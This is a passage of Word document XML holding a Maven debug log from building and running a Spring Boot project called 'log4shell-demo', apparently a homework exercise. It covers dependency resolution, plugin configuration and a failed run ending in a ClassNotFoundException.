    <w:p w14:paraId="23975A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org.tomlj:tomlj:jar:1.0.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0084F26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org.antlr:antlr4-runtime:jar:4.7.2:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07541C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com.google.code.findbugs:jsr305:jar:3.0.2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D284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org.springframework.boot:spring-boot-loader-tools:jar:2.5.5:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6722688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org.apache.maven.shared:maven-common-artifact-filters:jar:3.2.0:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E117A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org.apache.maven:maven-artifact:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F882C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org.apache.maven:maven-model:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56190C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org.apache.maven:maven-core:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0DB5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org.apache.maven:maven-settings:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFD6C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org.apache.maven:maven-settings-builder:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740FE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org.apache.maven:maven-repository-metadata:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637DBE8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org.apache.maven:maven-model-builder:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A02DF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org.apache.maven:maven-aether-provider:jar:3.1.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4688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org.eclipse.aether:aether-spi:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE3E8E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org.eclipse.aether:aether-impl:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616B31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org.codehaus.plexus:plexus-interpolation:jar:1.19:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6853E2F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org.codehaus.plexus:plexus-component-annotations:jar:1.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7536D2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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532FCD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org.sonatype.plexus:plexus-cipher:jar:1.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFE24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commons-io:commons-io:jar:2.6:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDB4C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org.eclipse.aether:aether-api:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B14766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org.eclipse.aether:aether-util:jar:0.9.0.M2:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0ECA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org.eclipse.sisu:org.eclipse.sisu.plexus:jar:0.0.0.M5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5189A0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javax.enterprise:cdi-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5D6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javax.annotation:jsr250-api:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518919A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javax.inject:javax.inject:jar:1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AA3C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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CD343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aopalliance:aopalliance:jar:1.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5885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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F565F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org.apache.maven.shared:maven-shared-utils:jar:3.3.3:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E54B2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org.apache.maven:maven-plugin-api:jar:3.6.3:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623FA5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org.codehaus.plexus:plexus-utils:jar:3.2.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5F3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org.codehaus.plexus:plexus-classworlds:jar:2.6.0:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65430FB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org.sonatype.plexus:plexus-build-api:jar:0.0.7:runtime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BE8AF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org.apache.maven.plugins:maven-shade-plugin:jar:3.2.4:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E5008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org.apache.maven.shared:maven-artifact-transfer:jar:0.12.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C518D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org.slf4j:slf4j-api:jar:1.7.5:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBEFC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org.ow2.asm:asm:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF0D7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org.ow2.asm:asm-commons:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7DF6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org.ow2.asm:asm-tree:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517321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org.ow2.asm:asm-analysis:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DE8F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org.jdom:jdom2:jar:2.0.6:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3CDC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org.apache.maven.shared:maven-dependency-tree:jar:3.0.1:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D617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org.vafer:jdependency:jar:2.4.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4DEC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org.ow2.asm:asm-util:jar:8.0:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D32D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com.google.guava:guava:jar:28.2-android:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="001335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com.google.guava:failureaccess:jar:1.0.1:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF7299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com.google.guava:listenablefuture:jar:9999.0-empty-to-avoid-conflict-with-guava:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540450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org.checkerframework:checker-compat-qual:jar:2.5.5:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A00E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com.google.errorprone:error_prone_annotations:jar:2.3.4:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B657FE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com.google.j2objc:j2objc-annotations:jar:1.3:compile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE7C2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org.apache.commons:commons-lang3:jar:3.7:compile (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4923CB2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Created new class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D345C8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Importing foreign packages into class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE489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&lt; maven.api</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C470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Populating class realm plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2BF4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org.springframework.boot:spring-boot-maven-plugin:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204D07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org.springframework.boot:spring-boot-buildpack-platform:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463466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com.fasterxml.jackson.core:jackson-databind:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6359CB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com.fasterxml.jackson.core:jackson-annotations:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D82A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com.fasterxml.jackson.core:jackson-core:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEBE3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com.fasterxml.jackson.module:jackson-module-parameter-names:jar:2.12.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D80E63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net.java.dev.jna:jna-platform:jar:5.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C1A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net.java.dev.jna:jna:jar:5.7.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C59EB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org.apache.commons:commons-compress:jar:1.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B698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org.apache.httpcomponents:httpclient:jar:4.5.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FF2F2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org.apache.httpcomponents:httpcore:jar:4.4.13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C0B4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commons-logging:commons-logging:jar:1.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C90C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Included: commons-codec:commons-codec:jar:1.11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F63A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org.springframework:spring-core:jar:5.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2221D6D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org.springframework:spring-jcl:jar:5.3.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AD1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org.tomlj:tomlj:jar:1.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7694BE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org.antlr:antlr4-runtime:jar:4.7.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437042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com.google.code.findbugs:jsr305:jar:3.0.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B54C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org.springframework.boot:spring-boot-loader-tools:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A325C3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org.apache.maven.shared:maven-common-artifact-filters:jar:3.2.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79099D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org.codehaus.plexus:plexus-interpolation:jar:1.19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCBB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org.codehaus.plexus:plexus-component-annotations:jar:1.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F13C0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org.sonatype.plexus:plexus-sec-dispatcher:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C341A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org.sonatype.plexus:plexus-cipher:jar:1.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BA5FF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commons-io:commons-io:jar:2.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFFB8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org.eclipse.aether:aether-util:jar:0.9.0.M2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0965E41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javax.enterprise:cdi-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EBA7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javax.annotation:jsr250-api:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F79A0B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org.sonatype.sisu:sisu-guice:jar:no_aop:3.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7816B8B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aopalliance:aopalliance:jar:1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB8F5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org.eclipse.sisu:org.eclipse.sisu.inject:jar:0.0.0.M5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5C8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org.apache.maven.shared:maven-shared-utils:jar:3.3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270619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org.codehaus.plexus:plexus-utils:jar:3.2.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFB9D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org.sonatype.plexus:plexus-build-api:jar:0.0.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E857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org.apache.maven.plugins:maven-shade-plugin:jar:3.2.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0676DD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org.apache.maven.shared:maven-artifact-transfer:jar:0.12.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191E8C8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org.ow2.asm:asm:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44018E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org.ow2.asm:asm-commons:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC1C9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org.ow2.asm:asm-tree:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476403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org.ow2.asm:asm-analysis:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F9D5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org.jdom:jdom2:jar:2.0.6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258372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Included: org.apache.maven.shared:maven-dependency-tree:jar:3.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC683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org.vafer:jdependency:jar:2.4.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A2E3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org.ow2.asm:asm-util:jar:8.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F918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com.google.guava:guava:jar:28.2-android</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6640703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com.google.guava:failureaccess:jar:1.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D9A5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com.google.guava:listenablefuture:jar:9999.0-empty-to-avoid-conflict-with-guava</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6C3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org.checkerframework:checker-compat-qual:jar:2.5.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3975672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com.google.errorprone:error_prone_annotations:jar:2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680207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com.google.j2objc:j2objc-annotations:jar:1.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F105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org.apache.commons:commons-lang3:jar:3.7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C59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org.springframework.boot:spring-boot-maven-plugin:2.5.5:run from plugin realm ClassRealm[plugin&gt;org.springframework.boot:spring-boot-maven-plugin:2.5.5, parent: jdk.internal.loader.ClassLoaders$AppClassLoader@4e0e2f2a]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22952E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'org.springframework.boot:spring-boot-maven-plugin:2.5.5:run' with basic configurator --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50220A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addResources = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E846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agents = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD341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classesDirectory = /home/ec2-user/log4shell-homework/target/classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95E51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directories = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8266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excludes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAB5F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fork = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F80ABF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includes = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5650C0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mainClass = com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73021FB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optimizedLaunch = true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338696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profiles = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3F04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project = MavenProject: com.example:log4shell-demo:0.0.1-SNAPSHOT @ /home/ec2-user/log4shell-homework/pom.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058BF2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session = org.apache.maven.execution.MavenSession@616b241a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64EF12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skip = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429E97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useTestClasspath = false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593350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end configuration --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AF5F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 Attaching agents: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E03C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JVM argument(s): -XX:TieredStopAtLevel=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8705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Classpath for forked process: /home/ec2-user/log4shell-homework/target/classes:/home/ec2-user/.m2/repository/org/springframework/boot/spring-boot/2.5.5/spring-boot-2.5.5.jar:/home/ec2-user/.m2/repository/org/springframework/boot/spring-boot-autoconfigure/2.5.5/spring-boot-autoconfigure-2.5.5.jar:/home/ec2-user/.m2/repository/ch/qos/logback/logback-classic/1.2.6/logback-classic-1.2.6.jar:/home/ec2-user/.m2/repository/ch/qos/logback/logback-core/1.2.6/logback-core-1.2.6.jar:/home/ec2-user/.m2/repository/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-to-slf4j/2.14.1/log4j-to-slf4j-2.14.1.jar:/home/ec2-user/.m2/repository/org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar:/home/ec2-user/.m2/repository/org/slf4j/jul-to-slf4j/1.7.32/jul-to-slf4j-1.7.32.jar:/home/ec2-user/.m2/repository/jakarta/annotation/jakarta.annotation-api/1.3.5/jakarta.annotation-api-1.3.5.jar:/home/ec2-user/.m2/repository/org/springframework/spring-core/5.3.10/spring-core-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-jcl/5.3.10/spring-jcl-5.3.10.jar:/home/ec2-user/.m2/repository/org/yaml/snakeyaml/1.28/snakeyaml-1.28.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-databind/2.12.5/jackson-databind-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-annotations/2.12.5/jackson-annotations-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/core/jackson-core/2.12.5/jackson-core-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jdk8/2.12.5/jackson-datatype-jdk8-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/datatype/jackson-datatype-jsr310/2.12.5/jackson-datatype-jsr310-2.12.5.jar:/home/ec2-user/.m2/repository/com/fasterxml/jackson/module/jackson-module-parameter-names/2.12.5/jackson-module-parameter-names-2.12.5.jar:/home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-core/9.0.53/tomcat-embed-core-9.0.53.jar:/home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-el/9.0.53/tomcat-embed-el-9.0.53.jar:/home/ec2-user/.m2/repository/org/apache/tomcat/embed/tomcat-embed-websocket/9.0.53/tomcat-embed-websocket-9.0.53.jar:/home/ec2-user/.m2/repository/org/springframework/spring-web/5.3.10/spring-web-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-beans/5.3.10/spring-beans-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-webmvc/5.3.10/spring-webmvc-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-aop/5.3.10/spring-aop-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-context/5.3.10/spring-context-5.3.10.jar:/home/ec2-user/.m2/repository/org/springframework/spring-expression/5.3.10/spring-expression-5.3.10.jar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F4E1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Application argument(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327377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Environment variable(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AA024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Could not find or load main class com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2693F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Caused by: java.lang.ClassNotFoundException: com.example.Log4ShellDemoApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260674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60A46E5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 FAILURE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2ADB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4A365E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 Total time:  2.509 s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D66A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Finished at: 2025-05-28T23:35:32Z</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C8D5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31ADEC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Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1 -&gt; [Help 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7868583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org.apache.maven.lifecycle.LifecycleExecutionException: Failed to execute goal org.springframework.boot:spring-boot-maven-plugin:2.5.5:run (default-cli) on project log4shell-demo: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560DB87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(MojoExecutor.java:215)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676B39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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179CDA6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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7772A6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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047A13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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3DCF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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105055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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E349D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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E94DC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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD27B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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08EA57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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213509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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC918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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC12B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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AEB4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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19590F2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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6359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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B638C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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651584C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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05938C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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08932B2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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EA7D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Caused by: org.apache.maven.plugin.MojoExecutionException: Application finished with exit code: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDFB8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at org.springframework.boot.maven.RunMojo.runWithForkedJvm (RunMojo.java:101)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B059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org.springframework.boot.maven.AbstractRunMojo.doRunWithForkedJvm (AbstractRunMojo.java:286)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037944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org.springframework.boot.maven.AbstractRunMojo.run (AbstractRunMojo.java:251)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4324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org.springframework.boot.maven.AbstractRunMojo.execute (AbstractRunMojo.java:223)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C9E1E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org.apache.maven.plugin.DefaultBuildPluginManager.executeMojo (DefaultBuildPluginManager.java:137)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB5D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(MojoExecutor.java:210)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F713B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(MojoExecutor.java:156)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76073D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(MojoExecutor.java:148)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC9CCC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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:117)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC217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org.apache.maven.lifecycle.internal.LifecycleModuleBuilder.buildProject (LifecycleModuleBuilder.java:81)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270309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org.apache.maven.lifecycle.internal.builder.singlethreaded.SingleThreadedBuilder.build (SingleThreadedBuilder.java:56)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8E96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org.apache.maven.lifecycle.internal.LifecycleStarter.execute (LifecycleStarter.java:128)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B274A2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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:305)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5399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org.apache.maven.DefaultMaven.doExecute (DefaultMaven.java:192)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B43D2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org.apache.maven.DefaultMaven.execute (DefaultMaven.java:105)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43DF856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org.apache.maven.cli.MavenCli.execute (MavenCli.java:972)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710DEA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org.apache.maven.cli.MavenCli.doMain (MavenCli.java:293)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5BC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org.apache.maven.cli.MavenCli.main (MavenCli.java:196)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17520D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jdk.internal.reflect.NativeMethodAccessorImpl.invoke0 (Native Method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D278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jdk.internal.reflect.NativeMethodAccessorImpl.invoke (NativeMethodAccessorImpl.java:77)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426E98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jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke (DelegatingMethodAccessorImpl.java:43)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CF80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java.lang.reflect.Method.invoke (Method.java:569)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A76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org.codehaus.plexus.classworlds.launcher.Launcher.launchEnhanced (Launcher.java:282)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E19A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org.codehaus.plexus.classworlds.launcher.Launcher.launch (Launcher.java:225)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E030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org.codehaus.plexus.classworlds.launcher.Launcher.mainWithExitCode (Launcher.java:406)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BB26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org.codehaus.plexus.classworlds.launcher.Launcher.main (Launcher.java:347)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFE8C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2921B5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0D4239E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For more information about the errors and possible solutions, please read the following articles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B35C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[ERROR] [Help 1] http://cwiki.apache.org/confluence/display/MAVEN/MojoExecutionException</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFA47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java -version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B88AA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openjdk version "17.0.15" 2025-04-15 LTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1509F8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OpenJDK Runtime Environment Corretto-17.0.15.6.1 (build 17.0.15+6-LTS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8F7E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OpenJDK 64-Bit Server VM Corretto-17.0.15.6.1 (build 17.0.15+6-LTS, mixed mode, sharing)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFE58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clean package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118F5A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438C94C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0334BBA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 com.example:log4shell-demo &gt;---------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="191017A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log4shell-demo 0.0.1-SNAPSHOT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1968A35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jar ]---------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FDFA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94404B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maven-clean-plugin:3.1.0:clean (default-clean) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01752A9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Deleting /home/ec2-user/log4shell-homework/target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F065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F7306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maven-resources-plugin:3.2.0:resources (default-resources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADF15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2B5410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52F772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79F6142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70712C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0CB244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maven-compiler-plugin:3.8.1:compile (default-compile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3BFD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3468CC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369A6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maven-resources-plugin:3.2.0:testResources (default-testResources) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771CE6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2AC4C9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5A6387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/home/ec2-user/log4shell-homework/src/test/resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37611E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23D92B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 --- maven-compiler-plugin:3.8.1:testCompile (default-testCompile) @ log4shell-demo ---</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F95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36FAD9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5085A1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maven-surefire-plugin:2.22.2:test (default-test) @ log4shell-demo ---</w:t>
      </w:r>
